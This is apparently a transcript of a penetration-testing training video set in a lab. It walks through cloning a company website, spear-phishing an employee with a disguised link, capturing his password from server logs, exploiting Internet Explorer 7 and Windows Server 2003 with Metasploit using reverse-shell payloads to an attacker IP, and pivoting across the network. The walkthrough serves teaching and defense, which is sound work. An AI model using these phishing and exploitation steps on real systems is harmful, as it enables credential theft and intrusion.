In this video, we're going to talk about how we can use Metasploit in order to help us attack a remote machine. Now, in this particular scenario, what we're going to be doing is we're going to be actually mimicking a website in order to attract customers to come to our website. And then once that's done, we'll end up setting up Metasploit in order to take place of that website and hopefully have the end user log in. At that point, we will then have essentially remote access to this person's computer and be able to do whatever we want to it, which we will then be able to use as a pivot to attack the rest of the network. So for instance, if we look at our existing environment, what we are going to be doing is down here on this, actually first off, up here on this 2003 SQL machine, there is a website. And what we're going to do is we're going to clone that down onto our backtrack machine. Once we've cloned that, we're then going to attack the user or send a phishing email up to the user up here on the XP machine to ask him to log into our website and basically pretend, hey, we're having some problems with this. Can you test it out for us? Because people want to be useful and friendly, of course they're going to do that. So once the user connects down to it, and we're sure that they'll connect in, what we can then do is we can then launch Metasploit to make that site malicious. At that point, we will then have attacked that Windows XP Pro machine, which we can then use to help pivot our attack to the other computers on our network. Let's go ahead and take a look at what that would be. So here I have our backtrack machine. And first thing I'm going to do is just open up a web browser. And I'm just going to check out what the company's website may be. So I'm going to go to server.xyzcompany.com. And we can see there's the website that we want to basically clone on our local computer. Now, before we can clone that, let's go ahead and look at one of the tools that we might be using, which is a command line tool called wget. Wget allows us to download files from the internet. And there's lots and lots of options here that we can pull from, which can all be extremely helpful. So for instance, let's go ahead and try just wget our website. So wget http://server.xyzcompany.com. Well, we see it went ahead and downloaded it. Looks like it saved it as an index.html file. Well, let's look to see what that looks like. Let's go ahead and open up our home folder and see, that's going to be that's right there, index.html. If I double click on that, it opens it up in Firefox, and we'll notice it doesn't quite look right. No, in fact, it should look like this, but instead we saw that. So how do we overcome that? How do we actually make it look right? Well, it turns out that there's a couple of other options we need to specify when we use wget. So if we go back to our wget command here, what I'm going to do is I'm going to do a wget-m-p, M for mirror, P, what does P stand for? Page prerequisites. So M will mirror the website, which means gets all the files that are associated with it. And then P, which downloads all prerequisites, such as pictures and other files that might be included, such as scripts that are necessary for the web page. So let's go ahead and try that. wget-m-p http server.xyzcompany.com. And now I can see it actually downloaded quite a bit of data. Well, let's see what that looks like. If I go back to my file explorer, I'll see that instead of the index.html that it had downloaded previously, it now has a folder called server.xyzcompany. So because I told it to download all the prerequisites and mirror the website, it actually created it into its own little folder. If I look into there I see my index.html, and now if I double click on it, it opens up, and now I have the picture, I have the black background, and everything looks like it should. So I've gone ahead and I've essentially cloned the website. Now that I've cloned the website, now I just need to prepare my local server to act as a web server hosting this website. So let's go ahead and on a Linux machine that is normally in the /var/www directory. If I do an ls, I can see my files there. I'm going to go ahead and rerun that wget command to re-download everything. And I'm actually going to delete the initial index.html. If I scroll back up, actually, before I talk about that, when I cd'd into the var www directory, there was already an index.html file here. I don't want that index.html. So I told it, go ahead and download everything from server XYZ company and then delete this original index.html. Now, if I do an ls, I can see, yep, there's my server.xyz company and my original index.html is gone. What I want to do is I want to move everything from that server folder into the current var www. So let me cd into it and then cp-r for recursive, star for everything. And I want that to go to var www. There we go. Now when I'm in the var www directory, I now have my index, I now have my images, I now have my robots.txt. I have everything on my local web server that should duplicate everything that was on the corporate website. Well, let's go ahead and try it. Let's go ahead and start that website. So Apache 2 CTL start. So it should start the website. And now in my web browser, if I go to http://127.0.0.1, which is the local host, I will now see the full website. Now, this isn't a fully functional website. For instance, I cannot log into it, but at least the front page looks right. So I'm now set and ready to go. At this point, I now am ready to attack my victim. In order to attack my victim, well, I want to send him an email. So I've got here a Windows 7 machine that's on the outside of my network. It's gone ahead, it's connected up to the network. What I want to do is I want to write an email to my target victim. So I'm going to go ahead and open up Outlook, and I'm going to configure it kind of improperly. I'm going to say, yes, I want to do a POP connection. I'm going to say I'm Sam. Specifically, I am S. Perkins at XYZ Company. Now, hopefully I've gone ahead and I've done some reconnaissance. And so I know that there is, in fact, a user named Sam Perkins, at this company. And I know a little bit about him, specifically being that he's somewhere in IT. Let's see, 216.111. All right. So the fact that he's in IT, then he would be normal for him to send a message to somebody saying, hey, I'm working on a problem. Can you check it out? So that's what we're going to do. So I've just told this that I am Sam Perkins, and now I want to start crafting an email. I'm going to type this a little fast because, well, it's just an example. I don't have to be perfect. Let's see. So he's going to be emailing somebody named Reggie, and he's going to say, I'm having issues with the SQL server. Can you log into the server at http server.xyzcompany.com and test it. Let me know if it worked. And that's from Sam. Now, obviously, that's not the best message in the world, but for this demo, it works pretty good. What I'm going to do is I'm going to save this file. I'm not actually going to send it yet. I'm going to go up to File. I'm going to say Save As. And it says, what type of file do you want to save this as? And I want to save it as an HTML file. And let's go ahead and just call this SQL. And then close it. No. Now that I've gone ahead and I've saved that file, I want to edit this document. So I say documents, there's my SQL file. I want to go ahead and edit that. Just right click and edit. And here I can now see the raw HTML code. If you're familiar with HTML, this will look somewhat familiar to you. Basically, what we're looking for is for this href tag right here. The way href tags is we start off with an actual link right here, which is the site that we actually want to go to. And then beyond that, we have some friendly text before the closing of the A tag. Now, the friendly text in this case can say server.xyzcompany.com, but because we're hackers and we're malicious, we want to update the unfriendly text or the hidden text to point to our web server, to point to our external site that is mimicking our server.xyzcompany. So I'm going to go ahead and edit the href portion of it. I'm going to just point in 216.6.1.100, which is the IP address of our machine outside, our Kali machine outside on the internet. Go ahead and save that. I close it. And now that I've edited that file, I can go ahead and create a new email. This time I'm going to insert file. I'm going to select my SQL. I'm going to select to the right of the insert, there's a little drop down arrow. I'm going to say insert as text. So that will insert the text that we had just edited out of our text file. All right, so I'm sending this to Reggie. His email is rmiller@xyzcompany.com. And then subject, SQL Server test. And I will send. All right, so at this point, we've sent an email, a phishing email, kind of a spear phishing email to Reggie Miller, a person who we know that Sam would possibly send messages to saying, hey, can you please test this website and let me know if it works. Hopefully, Reggie will log in and run into that web page. Let's check him out. Let's go ahead and log in as Reggie, and then we'll go ahead and open up Reggie's email. There we go. We see we've got an unread email message, and there's the message from Sam that we just wrote. Awesome. Now, if I hover over this link, we will see down in the lower left-hand corner here the actual URL that's going to be sent to. Even though it says server.xyzcompany, it is going to be sending to that address instead. So the friendly text looks right. The unfriendly does not. So what happens when Reggie goes ahead and clicks on that? Well, that should open up a web browser and it goes to the website. And at first glance, this looks normal. This isn't quite right up here. The address bar isn't quite right, but everything else looks perfectly normal. So if Reggie was to log in, well, he'll go ahead and type in his credentials. R. Miller, Pacers123 for the password, and then submit. Yeah, don't show me again. And oh no, something's broken. In theory, at this point, Reggie's going to be emailing back and say, no, it's not working. The website's broken. Now, in reality, we would expect this because we cloned the website content. We didn't clone the backend database. So it doesn't know how to log these people in. It just simply knows how to look right. Well, if we're the attackers, however, that gave us quite a bit of information. If we go back to our system here, we can actually tail the var log Apache 2 access log, and we'll see how people are logging in. For instance, this right here, well, that's Reggie Miller trying to log in. We can see he's going to the admin login.asp page. It has specifically typed in the R. Miller username and the password of Pacers123. So we've kind of just stolen his username and password. That's kind of nice. Additionally, we can see a little bit of information about what type of browser and possibly operating system he's running. It says, for instance, this is running, looks like MSIE version 7.0, running NT 5.1. Now we could do some browsing online and confirm that MSIE 7.0 Windows NT 5.1 combination probably means you're running Windows XP with IE 7.0 browser. All right, so we're learning lots of great stuff about the system we're attacking. We kind of have credentials. We might be able to start doing something with that. But let's see what else we can do first. Now, we've already gotten this user to click on the link once. We could probably get him to do it again. So I'm going to go ahead and I'm going to stop the website. So Apache to control stop. Once I've stopped the console, well, let's go ahead or stop the website. Let's go ahead and open up the Metasploit console. So MSF console. And what we're going to do is we're going to look for exploits we can use against Internet Explorer 7. All right, so we've got the Metasploit console up and running. Let's go ahead and search. Specifically a type of exploit with a name of Internet Explorer. And it gives us a large list of possible exploits available for Internet Explorer. Now, if we look through here, we're going to find probably the one that we know is going to work the most in this particular scenario. It's going to be MS09002 with memory corruption. So I'm going to go ahead and do some info on that. Info, exploits, Windows, browser, MS09002. And when we look at right there, available targets, who does this actually go against? Well, it goes against Windows XP with Service Packs 2 or 3 and IE7. Well, our logs suggest that they were running IE7 and are probably running Windows XP, so this is probably a good exploit for that target machine. So let's go ahead and use that. So use exploit Windows browser MS09002. There we go. Let's go ahead and look at the options we have. Well, we need to specify a host and a port, and the rest are optional, but we probably want to specify at least one of those. So the first one, I want to set the service host, or the set SRV host to my public IP for this machine, which just happens to be 216.6.1.100. Next thing I want to do is I want to set this port case sensitive to port 80, because we've already got him to connect. We've already gotten our target to connect to port 80 on this machine once. Shouldn't be hard to get them to connect again. Once that's done, I will actually set the URI path while we're here to just simply a slash. Our target, our target person, went straight to the website without any slash login or slash admin or anything like that. So just by doing a slash should put it at the beginning of the root, or the root of the website. All right, now that we've got the attack, last thing we want to do is we want to specify a payload. So set payload to the Windows interpreter reverse TCP. There we go. And now if we do show options, new options will show up specifically for the payload. For instance, the L host and the L port. Let's go ahead and set the L host to the same as our SRV host up here. 216.6.1.100. And at that, we're good to go. We're ready to attack. So let's go ahead and exploit. All right, so now it is now listening on this port and this IP. And as soon as a user connects to that URL, they will be exploited, assuming they're running a correct version of Windows and Internet Explorer. All right, with that being said, all we have to do is we have to get Reggie to come back in. So let's go back to our mail client and let's see, I'm going to say sent items. I'm actually going to do a reply all. So I'm going to reply back to Reggie. There we go. Reply back to Reggie. And I'm going to say, hey, I think I fixed it. I think I fixed the issue. Can you retest? And say send. All right, at this point, Reggie is now receiving a second email, again, pointing back to the same URL. Send it received, there we go. Again, if I hover over this, then we'll see the link in the lower left-hand corner is still pointing to the same server. So he's going to click on that. And he's going to see, yeah, it's even worse now. Hey, that website you were having problems with that you think you fixed, now it's even worse. Well, so hopefully he's sending me a message back saying it's still broken. But as a hacker, I then look back at my Kali machine and I see, oh, somebody connected. That's cool. I've sent them the attack. Staging worked. It opened up a session. It was currently in iExplore and then migrated to Notepad. I'm now on the machine. And now if I type in sessions-L, I'll see I have one session, which is on my target machine. But I can then enter -I1 to go into interactive mode. And just to see, let's go ahead and do a shell command and let's drop into the C drive on a remote computer. There we go. We're on our remote computer. I can then type ipconfig/all and I can actually see all of the information about this Windows XP machine that Reggie just nicely gave to us. Wasn't that nice of Reggie? All right, so now that Reggie has given us this machine, there's so many things that we can do. We are down here on this backtrack machine, and we now have control of that guy. But I don't want just that computer. I want that computer and that computer. So what I want to do is I want to do a pivot process right there. I want to say, hey, everything that I try to do on this network, go through that computer, through that XP machine, and use it to attack everybody else. All right, let's get back into the Metasploit. And what I want to do is I want to use a command called autoroute. Autoroute-s, and I want to specify 192.168.1.0, which is the network that our XP machine is on. So this will add a route to our interpreter to say, hey, anything you're trying to do against 192.168.1.0, send it through this Windows XP machine. Add it as a router. Okay, well, let's try that. Let's try an ARP scanner. So run ARP scanner. Specifically for the 192.168.1.0/24 network. So the ARP scanner is just going to be doing an ARP scan, essentially a whole bunch of ARP requests against the entire network, but it's going across the internet and then bouncing back out of our XP Pro machine, and we can go ahead and see, yeah, machines are starting to respond. Nice. Well, I see I've got 3 machines here. See, this one right here is probably my gateway. These 2 are now my target machines. So let's see what we can do for those. what I want to do is I want to get out of this Meterpreter session and get back into Metasploit. So I want to kind of disconnect from my XP Pro session, but I still want to keep it active. So I'm going to go ahead and just type in background. That will background that session, keep it up and running along with my routing, but allow me to do additional exploits. So let's try a different scan. Let's see, use auxiliary scanner SMB underscore version. So at this point, we're going to be doing an SMB or server messaging block scan. Specifically, we want the R host to be 192.168.1.100. So we're going to scan against one specific machine, which was that guy right there. And then we're going to run. So this will tell us what type of operating system it is and other information about it. Let's see, Windows Server 2003 on the domain XYZ company. That's kind of nice of them. Well, since I know that's 2003, maybe there's an exploit I can do for that. Yep, it turns out there is. Specifically, use exploits Windows DCE RPC MS03 026 DCOM. If we look at our options, yeah, I need to specify a remote host and a remote port. The port 135 is standard SMB attacks. So set R host 192.168.1.100. Now I need to specify a payload. Once I attack this machine, I want it to connect back up to me. So set payload. Gonna do the same payload as before with my Windows Meterpreter reverse TCP. And this time for the L host, the L host is going to be the host of the XP Pro machine. XP Pro machine, IP 192.168.1.175. And then exploit. So even though I am attacking that remote machine, it actually looks like it's the XP Pro machine that is exploiting everybody else. I'm going to quickly check our XP Pro machine. Ooh, here's something questionable. So when end users going along on their day and they see a message that says, hey, we are trying to block something, do you want to keep doing that? Most everybody's going to just go ahead and say unblock. Standard practice. Get rid of it. Click whatever's necessary in order to unblock it. Let's see. Let's try that one more time, the exploit. There we go. Now it's sending the stage, and we will cross our fingers. Sometimes this has negative effects. Nope, it seems to have worked. All right, so it sent the stage, it exploited it, and now I have session number 2. So now if I do sessions-L, I should see no? I should be able to see all of my sessions. Oh, I'm already in the Meterpreter. That's why. And so now if I do an IP config, I can now see, yes, you are already in 192.168.1.100. Nice. Ooh, reason died. Sometimes this does actually cause negative aspects on the target machine, and most likely it caused the system to crash itself. So this is something you want to be careful with. If you're doing this as a penetration tester, you can cause machines to crash. Yeah. So that machine will reboot here in a couple of seconds, and when it's done, I could reconnect if I want to. Lastly, if I look back at my XP Pro machine, now this is the machine I'm using as my pivot. This is the machine that I'm using to attack everybody else. If I open up a command prompt, I could type netstat-an to get a listing of the network statistics. When I look through here, I can actually start seeing all the various network connections that are happening in my environment and which ones might be questionable. For instance, this guy right here, this traffic right here on port 4444 is extremely questionable and something I should be concerned about. If my connection back to my SQL server was still active, I would actually see another connection going from this machine to that one on ports 4444. So it is still possible to find this type of traffic as it's happening in your environment, but you have to know what to look for and how to look for it. So there we go. We have exploiting using Metasploit to attack a remote system. In this case, we delivered our attack via email, and we attracted somebody to a website which was then malicious. Once we attacked that one machine using the malicious website, we were then able to pivot our attack onto other computers on the network and be much more malicious in our processes.